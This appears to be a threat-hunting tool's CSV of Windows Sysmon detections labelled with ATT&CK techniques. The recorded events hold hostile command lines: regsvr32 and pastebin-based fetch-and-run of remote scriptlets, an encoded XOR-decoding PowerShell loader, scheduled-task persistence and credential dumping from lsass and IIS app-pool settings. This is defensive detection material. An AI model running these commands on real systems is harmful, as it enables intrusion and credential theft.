Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-13 00:28:16.115 + 747F3D96-3F20-5EBB-0000-0010035E3600 + 8052 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + C:\Windows\system32\cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-3821-5EBB-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-3821-5EBB-0000-001040690000 + 732 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.218211,2020-03-21T09:00:25.218211+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243538 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.021 + 747F3D96-9F69-5E75-0000-00106F6A2000 + 2536 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558398907.47416,2019-05-21T04:35:07.474160+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c pause ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 376 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 00:35:07.386 + 365ABB72-47BB-5CE3-0000-00108CAD3E00 + 3176 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\cmd.exe /c pause + C:\Users\IEUser\Downloads\ + IEWIN7\IEUser + 365ABB72-39CC-5CE3-0000-002096C70000 + 0xc796 + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-47BB-5CE3-0000-0010BFA83E00 + 1912 + C:\Users\IEUser\Downloads\com-hijack.exe + "C:\Users\IEUser\Downloads\com-hijack.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766825.218211,2020-03-21T09:00:25.218211+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243538 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.021 + 747F3D96-9F69-5E75-0000-00106F6A2000 + 2536 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558969979.57807,2019-05-27T19:12:59.578070+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn "eyNQLDvUSuvVPg" /tr "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6193 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:59.510 + 365ABB72-FE7B-5CEB-0000-0010867F0C00 + 4012 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn "eyNQLDvUSuvVPg" /tr "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-FD85-5CEB-0000-00104C0E0B00 + 1944 + C:\Windows\System32\notepad.exe + "C:\Windows\System32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1003] Credential Dumping - Process Access,1552849805.303341,2019-03-17T23:10:05.303341+04:00,,Threat,High,[T1003] Credential Dumping - Process Access,10," + + + + + 10 + 3 + 4 + 10 + 0 + 0x8000000000000000 + + + 4442 + + + + + Microsoft-Windows-Sysmon/Operational + PC04.example.corp + + + + + + 2019-03-17 19:10:02.068 + 365ABB72-9B85-5C8E-0000-0010C4CC1200 + 3576 + 3620 + C:\Windows\system32\taskmgr.exe + 365ABB72-0886-5C8F-0000-001030560000 + 476 + C:\Windows\system32\lsass.exe + 0x1fffff + C:\Windows\SYSTEM32\ntdll.dll+4595c|C:\Windows\SYSTEM32\ntdll.dll+1d4da|C:\Windows\system32\kernel32.dll+3cc47|C:\Windows\system32\kernel32.dll+3ff99|C:\Windows\system32\dbghelp.dll+4c791|C:\Windows\system32\dbghelp.dll+4dcab|C:\Windows\system32\dbghelp.dll+4a1b8|C:\Windows\system32\dbghelp.dll+45b81|C:\Windows\system32\dbghelp.dll+45e2a|C:\Windows\system32\taskmgr.exe+1360e|C:\Windows\system32\kernel32.dll+4ef8c|C:\Windows\SYSTEM32\ntdll.dll+6367a|C:\Windows\SYSTEM32\ntdll.dll+6364d + +",PC04.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557686932.766629,2019-05-12T22:48:52.766629+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16840 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 18:48:52.344 + 365ABB72-6A94-5CD8-0000-0010C2F10E00 + 3880 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" + c:\ProgramData\ + IEWIN7\IEUser + 365ABB72-695E-5CD8-0000-002015370100 + 0x13715 + 1 + Medium + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-6A94-5CD8-0000-00101BDB0E00 + 1340 + C:\ProgramData\jabber.exe + jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920557.971708,2019-05-27T05:29:17.971708+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Line Number: 0" /text:processmodel.username ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5907 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:17.931 + 365ABB72-3D6D-5CEB-0000-00108C7FFF00 + 3196 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Line Number: 0" /text:processmodel.username + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1555606584.893827,2019-04-18T20:56:24.893827+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( Powershell ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 13 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1086,technique_name=PowerShell + 2019-04-18 16:56:08.340 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + Powershell + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-AB27-5CB8-0000-002021CA0000 + 0xca21 + 1 + High + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-AC01-5CB8-0000-0010BB7E0700 + 1196 + C:\Windows\System32\cmd.exe + "cmd.exe" /s /k pushd "C:\Users\IEUser\Desktop" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 18851 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-18 17:51:14.254 + 365ABB72-4612-5CE0-0000-00103D1E2600 + 2600 + C:\Windows\System32\regsvr32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-433D-5CE0-0000-002031350100 + 0x13531 + 1 + Medium + SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 + 365ABB72-433C-5CE0-0000-00100FD20000 + 964 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 18851 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-18 17:51:14.254 + 365ABB72-4612-5CE0-0000-00103D1E2600 + 2600 + C:\Windows\System32\regsvr32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-433D-5CE0-0000-002031350100 + 0x13531 + 1 + Medium + SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 + 365ABB72-433C-5CE0-0000-00100FD20000 + 964 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 18851 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-18 17:51:14.254 + 365ABB72-4612-5CE0-0000-00103D1E2600 + 2600 + C:\Windows\System32\regsvr32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-433D-5CE0-0000-002031350100 + 0x13531 + 1 + Medium + SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 + 365ABB72-433C-5CE0-0000-00100FD20000 + 964 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920557.891593,2019-05-27T05:29:17.891593+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5904 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:17.851 + 365ABB72-3D6D-5CEB-0000-0010C47BFF00 + 560 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1558969979.519768,2019-05-27T19:12:59.519768+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe ) through command line ( \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6192 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:54.612 + 365ABB72-FE76-5CEB-0000-001015780C00 + 1260 + \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe + ? + ? + ? + ? + \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=D2A54176D8E86788FB6D588919031FEF7594A79C,MD5=5779C26E8F7B3E2C9354436E0081DF67,SHA256=64F02345E342749D381F7DF34E23CE304B3292F97DE9ECE0FB6E9B55466ADF44,IMPHASH=481F47BBB2C9C21E108D65F52B04C448 + 365ABB72-FE6C-5CEB-0000-00104A170C00 + 3680 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1558969979.519768,2019-05-27T19:12:59.519768+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe ) through command line ( \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6192 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:54.612 + 365ABB72-FE76-5CEB-0000-001015780C00 + 1260 + \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe + ? + ? + ? + ? + 